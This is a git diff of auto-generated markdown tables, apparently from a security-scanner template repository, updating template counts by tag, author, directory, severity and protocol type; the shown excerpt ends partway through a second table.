| | | | | | | | -| clockwatch | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| igs | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | \ No newline at end of file +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|--------------------|-------|--------------------------------------------|-------|-----------|-------|----------|-------|---------|-------| +| cve | 511 | dhiyaneshdk | 220 | Users | 1693 | info | 535 | http | 1566 | +| panel | 202 | pikpikcu | 195 | | | high | 426 | file | 42 | +| xss | 182 | pdteam | 187 | | | medium | 349 | network | 35 | +| wordpress | 180 | dwisiswant0 | 126 | | | critical | 201 | dns | 10 | +| exposure | 176 | geeknik | 119 | | | low | 147 | | | +| rce | 173 | daffainfo | 99 | | | | | | | +| cve2020 | 145 | madrobot | 60 | | | | | | | +| lfi | 143 | princechaddha | 52 | | | | | | | +| wp-plugin | 120 | gy741 | 48 | | | | | | | +| config | 90 | gaurang | 42 | | | | | | | +| cve2021 | 83 | pussycat0x | 34 | | | | | | | +| cve2019 | 82 | ice3man | 26 | | | | | | | +| tech | 78 | organiccrap | 24 | | | | | | | +| takeover | 72 | 0x_akoko | 20 | | | | | | | +| | 66 | sheikhrishad | 15 | | | | | | | +| cve2018 | 66 | milo2012 | 14 | | | | | | | +| token | 63 | philippedelteil | 14 | | | | | | | +| apache | 61 | pr3r00t | 13 | | | | | | | +| default-login | 50 | techbrunchfr | 13 | | | | | | | +| iot | 43 | suman_kar | 12 | | | | | | | +| cve2017 | 43 | cyllective | 11 | | | | | | | +| file | 42 | random_robbie | 10 | | | | | | | +| unauth | 40 | wdahlenb | 9 | | | | | | | +| network | 35 | righettod | 9 | | | | | | | +| sqli | 34 | iamthefrogy | 8 | | | | | | | +| oob | 32 | nadino | 8 | | | | | | | +| workflow | 29 | aashiq | 8 | | | | | | | +| logs | 29 | that_juan_ | 8 | | | | | | | +| oracle | 29 | melbadry9 | 8 | | | | | | | +| misc | 27 | hackergautam | 8 | | | | | | | +| ssrf | 27 | 0x240x23elu | 7 | | | | | | | +| atlassian | 26 | dr_set | 7 | | | | | | | +| jira | 26 | r3dg33k | 7 | | | | | | | +| disclosure | 25 | techryptic (@tech) | 7 | | | | | | | +| cve2016 | 23 | kophjager007 | 7 | | | | | | | +| listing | 22 | harshbothra_ | 7 | | | | | | | +| redirect | 20 | randomstr1ng | 7 | | | | | | | +| aem | 19 | emadshanab | 7 | | | | | | | +| cisco | 17 | oppsec | 7 | | | | | | | +| sap | 16 | __fazal | 6 | | | | | | | +| debug | 14 | caspergn | 6 | | | | | | | +| fuzz | 13 | puzzlepeaches | 6 | | | | | | | +| misconfig | 13 | yanyun | 5 | | | | | | | +| cve2015 | 13 | ganofins | 5 | | | | | | | +| struts | 13 | pentest_swissky | 5 | | | | | | | +| adobe | 12 | panch0r3d | 5 | | | | | | | +| auth-bypass | 12 | joanbono | 5 | | | | | | | +| weblogic | 12 | nodauf | 4 | | | | | | | +| android | 12 | iamnoooob | 4 | | | | | | | +| cve2011 | 11 | elsfa7110 | 4 | | | | | | | +| dns | 11 | github.com/its0x08 | 4 | | | | | | | +| cve2012 | 11 | e_schultze_ | 4 | | | | | | | +| zoho | 11 | xelkomy | 4 | | | | | | | +| springboot | 11 | meme-lord | 4 | | | | | | | +| dlink | 10 | rootxharsh | 4 | | | | | | | +| php | 10 | tess | 3 | | | | | | | +| devops | 10 | shine | 3 | | | | | | | +| jenkins | 10 | f1tz | 3 | | | | | | | +| cve2013 | 10 | _generic_human_ | 3 | | | | | | | +| cve2014 | 10 | dudez | 3 | | | | | | | +| magento | 9 | 0w4ys | 3 | | | | | | | +| ftp | 8 | jarijaas | 3 | | | | | | | +| aws | 8 | z3bd | 3 | | | | | | | +| router | 8 | fyoorer | 3 | | | | | | | +| cnvd | 8 | impramodsargar | 3 | | | | | | | +| rails | 8 | binaryfigments | 3 | | | | | | | +| airflow | 8 | thomas_from_offensity | 3 | | | | | | | +| gitlab | 8 | mavericknerd | 3 | | | | | | | +| nginx | 7 | yash anand @yashanand155 | 3 | | | | | | | +| joomla | 7 | kiblyn11 | 2 | | | | | | | +| xxe | 7 | dheerajmadhukar | 2 | | | | | | | +| vmware | 7 | random-robbie | 2 | | | | | | | +| scada | 7 | foulenzer | 2 | | | | | | | +| backup | 6 | afaq | 2 | | | | | | | +| cms | 6 | moritz nentwig | 2 | | | | | | | +| api | 6 | amsda | 2 | | | | | | | +| google | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| coldfusion | 6 | ehsahil | 2 | | | | | | | +| rconfig | 6 | randomrobbie | 2 | | | | | | | +| citrix | 6 | incogbyte | 2 | | | | | | | +| jetty | 6 | lu4nx | 2 | | | | | | | +| java | 5 | zomsop82 | 2 | | | | | | | +| circarlife | 5 | w4cky_ | 2 | | | | | | | +| laravel | 5 | 0xsapra | 2 | | | | | | | +| lucee | 5 | ree4pwn | 2 | | | | | | | +| dell | 5 | vavkamil | 2 | | | | | | | +| dedecms | 5 | 0xrudra | 2 | | | | | | | +| headless | 5 | emenalf | 2 | | | | | | | +| django | 5 | shifacyclewala | 2 | | | | | | | +| login | 5 | davidmckennirey | 2 | | | | | | | +| ibm | 5 | lotusdll | 2 | | | | | | | +| phpmyadmin | 5 | x1m_martijn | 2 | | | | | | | +| iis | 5 | unstabl3 | 2 | | | | | | | +| cve2009 | 5 | manas_harsh | 2 | | | | | | | +| files | 5 | bp0lr | 2 | | | | | | | +| ruijie | 5 | joeldeleep | 2 | | | | | | | +| confluence | 5 | 0xcrypto | 2 | | | | | | | +| solr | 5 | udit_thakkur | 2 | | | | | | | +| ssti | 5 | 0xelkomy | 2 | | | | | | | +| drupal | 5 | pxmme1337 | 2 | | | | | | | +| netgear | 5 | bing0o | 2 | | | | | | | +| moodle | 4 | fabaff | 2 | | | | | | | +| jolokia | 4 | gevakun | 2 | | | | | | | +| hongdian | 4 | 0xprial | 2 | | | | | | | +| tomcat | 4 | nkxxkn | 2 | | | | | | | +| solarwinds | 4 | swissky | 2 | | | | | | | +| thinkphp | 4 | hetroublemakr | 2 | | | | | | | +| magmi | 4 | koti2 | 2 | | | | | | | +| crlf | 4 | bsysop | 2 | | | | | | | +| traversal | 4 | noamrathaus | 1 | | | | | | | +| vpn | 4 | manuelbua | 1 | | | | | | | +| webserver | 4 | 52971 | 1 | | | | | | | +| fileupload | 4 | 0h1in9e | 1 | | | | | | | +| docker | 4 | abison_binoy | 1 | | | | | | | +| nodejs | 4 | sullo | 1 | | | | | | | +| artifactory | 4 | kareemse1im | 1 | | | | | | | +| asp | 4 | hakluke | 1 | | | | | | | +| samsung | 4 | vzamanillo | 1 | | | | | | | +| elastic | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| thinkcmf | 4 | yavolo | 1 | | | | | | | +| resin | 3 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| terramaster | 3 | andirrahmani1 | 1 | | | | | | | +| hp | 3 | omarkurt | 1 | | | | | | | +| nosqli | 3 | idealphase | 1 | | | | | | | +| fpd | 3 | zandros0 | 1 | | | | | | | +| deserialization | 3 | johnk3r | 1 | | | | | | | +| kafka | 3 | shreyapohekar | 1 | | | | | | | +| springcloud | 3 | mah3sec_ | 1 | | | | | | | +| microstrategy | 3 | bad5ect0r | 1 | | | | | | | +| vbulletin | 3 | naglinagli | 1 | | | | | | | +| grafana | 3 | un-fmunozs | 1 | | | | | | | +| amazon | 3 | mhdsamx | 1 | | | | | | | +| ebs | 3 | elmahdi | 1 | | | | | | | +| slack | 3 | ahmed sherif | 1 | | | | | | | +| kubernetes | 3 | gal nagli | 1 | | | | | | | +| cve2010 | 3 | undefl0w | 1 | | | | | | | +| ofbiz | 3 | regala_ | 1 | | | | | | | +| caucho | 3 | rtcms | 1 | | | | | | | +| bypass | 3 | ratnadip gajbhiye | 1 | | | | | | | +| printer | 3 | soyelmago | 1 | | | | | | | +| targa | 3 | bjhulst | 1 | | | | | | | +| log | 3 | luskabol | 1 | | | | | | | +| mongodb | 3 | bernardofsr | 1 | | | | | | | +| fanruan | 3 | andysvints | 1 | | | | | | | +| backups | 3 | kurohost | 1 | | | | | | | +| ssh | 3 | revblock | 1 | | | | | | | +| windows | 3 | alperenkesk | 1 | | | | | | | +| nacos | 3 | sicksec | 1 | | | | | | | +| lfr | 3 | thevillagehacker | 1 | | | | | | | +| git | 3 | its0x08 | 1 | | | | | | | +| r-seenet | 3 | r3naissance | 1 | | | | | | | +| openssh | 3 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | andré monteiro | | | | | | | | +| | | @am0nt31r0 | | | | | | | | +| oa | 3 | s1r1u5_ | 1 | | | | | | | +| kibana | 2 | akshansh | 1 | | | | | | | +| cve2008 | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| smtp | 2 | furkansenan | 1 | | | | | | | +| waf | 2 | kabirsuda | 1 | | | | | | | +| injection | 2 | 0xrod | 1 | | | | | | | +| zabbix | 2 | _darrenmartyn | 1 | | | | | | | +| kevinlab | 2 | shelld3v | 1 | | | | | | | +| nagios | 2 | ipanda | 1 | | | | | | | +| telerik | 2 | chron0x | 1 | | | | | | | +| proxy | 2 | alifathi-h1 | 1 | | | | | | | +| openam | 2 | dawid czarnecki | 1 | | | | | | | +| spark | 2 | pdp | 1 | | | | | | | +| keycloak | 2 | 0xtavian | 1 | | | | | | | +| kentico | 2 | affix | 1 | | | | | | | +| leak | 2 | taielab | 1 | | | | | | | +| voipmonitor | 2 | th3.d1p4k | 1 | | | | | | | +| pega | 2 | shifacyclewla | 1 | | | | | | | +| nextjs | 2 | luci | 1 | | | | | | | +| dos | 2 | mubassirpatel | 1 | | | | | | | +| jellyfin | 2 | patralos | 1 | | | | | | | +| nexus | 2 | c3l3si4n | 1 | | | | | | | +| sonicwall | 2 | ooooooo_q | 1 | | | | | | | +| strapi | 2 | rojanrijal | 1 | | | | | | | +| zhiyuan | 2 | defr0ggy | 1 | | | | | | | +| httpd | 2 | toufik airane | 1 | | | | | | | +| paloalto | 2 | flag007 | 1 | | | | | | | +| globalprotect | 2 | arcc | 1 | | | | | | | +| rockethchat | 2 | geraldino2 | 1 | | | | | | | +| saltstack | 2 | apt-mirror | 1 | | | | | | | +| odoo | 2 | sickwell | 1 | | | | | | | +| chamilo | 2 | j33n1k4 | 1 | | | | | | | +| bigip | 2 | willd96 | 1 | | | | | | | +| openfire | 2 | ohlinge | 1 | | | | | | | +| trixbox | 2 | hanlaomo | 1 | | | | | | | +| microsoft | 2 | knassar702 | 1 | | | | | | | +| ucmdb | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| shellshock | 2 | tim_koopmans | 1 | | | | | | | +| xxljob | 2 | fopina | 1 | | | | | | | +| hpe | 2 | schniggie | 1 | | | | | | | +| cve2007 | 2 | b0yd | 1 | | | | | | | +| oauth | 2 | 0xteles | 1 | | | | | | | +| rockmongo | 2 | smaranchand | 1 | | | | | | | +| prometheus | 2 | deena | 1 | | | | | | | +| intrusive | 2 | yashanand155 | 1 | | | | | | | +| glassfish | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| sonarqube | 2 | retr0 | 1 | | | | | | | +| frp | 2 | ilovebinbash | 1 | | | | | | | +| chiyu | 2 | kba@sogeti_esec | 1 | | | | | | | +| hjtcloud | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| cache | 2 | exploitation | 1 | | | | | | | +| emerge | 2 | notsoevilweasel | 1 | | | | | | | +| icewarp | 2 | co0nan | 1 | | | | | | | +| rstudio | 2 | gboddin | 1 | | | | | | | +| hashicorp | 2 | @github.com/defr0ggy | 1 | | | | | | | +| yapi | 2 | pudsec | 1 | | | | | | | +| mida | 2 | aceseven (digisec360) | 1 | | | | | | | +| seeyon | 2 | streetofhackerr007 | 1 | | | | | | | +| sharepoint | 2 | alex | 1 | | | | | | | +| plesk | 2 | yashgoti | 1 | | | | | | | +| igs | 2 | akash.c | 1 | | | | | | | +| linkerd | 2 | alph4byt3 | 1 | | | | | | | +| couchdb | 2 | berkdusunur | 1 | | | | | | | +| idrac | 2 | rodnt | 1 | | | | | | | +| activemq | 2 | _harleo | 1 | | | | | | | +| fortios | 2 | sy3omda | 1 | | | | | | | +| splunk | 2 | sshell | 1 | | | | | | | +| webcam | 2 | remonsec | 1 | | | | | | | +| service | 2 | zhenwarx | 1 | | | | | | | +| maian | 2 | ldionmarcil | 1 | | | | | | | +| flir | 2 | micha3lb3n | 1 | | | | | | | +| mail | 2 | sushant kamble | 1 | | | | | | | +| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | +| ecology | 2 | thezakman | 1 | | | | | | | +| jboss | 2 | mohammedsaneem | 1 | | | | | | | +| showdoc | 2 | jteles | 1 | | | | | | | +| smb | 2 | petruknisme | 1 | | | | | | | +| huawei | 2 | makyotox | 1 | | | | | | | +| wordfence | 2 | absshax | 1 | | | | | | | +| bitrix | 2 | cookiehanhoan | 1 | | | | | | | +| vrealize | 2 | divya_mudgal | 1 | | | | | | | +| natshell | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| zenario | 1 | dogasantos | 1 | | | | | | | +| enum | 1 | b4uh0lz | 1 | | | | | | | +| csod | 1 | tirtha_mandal | 1 | | | | | | | +| rfi | 1 | jeya seelan | 1 | | | | | | | +| seacms | 1 | wabafet | 1 | | | | | | | +| spf | 1 | @dwisiswant0 | 1 | | | | | | | +| sco | 1 | iampritam | 1 | | | | | | | +| expose | 1 | vsh00t | 1 | | | | | | | +| azure | 1 | bolli95 | 1 | | | | | | | +| chevereto | 1 | raesene | 1 | | | | | | | +| firebase | 1 | fmunozs | 1 | | | | | | | +| sprintful | 1 | d0rkerdevil | 1 | | | | | | | +| javafaces | 1 | becivells | 1 | | | | | | | +| fortigates | 1 | johnjhacking | 1 | | | | | | | +| clusterengine | 1 | 0ut0fb4nd | 1 | | | | | | | +| proftpd | 1 | ajaysenr | 1 | | | | | | | +| iptime | 1 | juicypotato1 | 1 | | | | | | | +| goahead | 1 | qlkwej | 1 | | | | | | | +| ssltls | 1 | daviey | 1 | | | | | | | +| zend | 1 | whynotke | 1 | | | | | | | +| javamelody | 1 | j3ssie/geraldino2 | 1 | | | | | | | +| visualtools | 1 | aresx | 1 | | | | | | | +| nedi | 1 | blckraven | 1 | | | | | | | +| eprints | 1 | nytr0gen | 1 | | | | | | | +| zarafa | 1 | _c0wb0y_ | 1 | | | | | | | +| avtech | 1 | ringo | 1 | | | | | | | +| kong | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| jsf | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| glpi | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| akkadian | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| axis | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 8f5b14bdca..285ff16096 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 | -| panel | 201 | pdteam | 184 | vulnerabilities | 230 | high | 395 | file | 42 | -| xss | 169 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 | -| wordpress | 164 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 | -| rce | 162 | geeknik | 